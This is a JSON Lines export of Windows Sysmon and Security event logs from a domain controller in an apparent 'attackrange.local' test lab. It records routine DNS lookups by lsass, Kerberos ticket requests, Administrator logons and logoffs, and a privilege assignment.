{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2618,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.732\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _gc._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.732","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_gc._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2619,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.736\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _kerberos._udp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.736","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_kerberos._udp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2620,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.739\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _kpasswd._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.739","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_kpasswd._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2621,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.742\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _kpasswd._udp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.742","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_kpasswd._udp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2622,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.746\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.746","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2623,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.749\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.749","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2624,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.754\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.754","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2625,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.757\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.757","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2626,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.761\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.761","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220366,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x481D7\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x481d7","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2627,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.438\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.438","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220367,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220368,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220369,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220370,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48E1B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x48e1b","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220371,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48E1B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x48e1b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
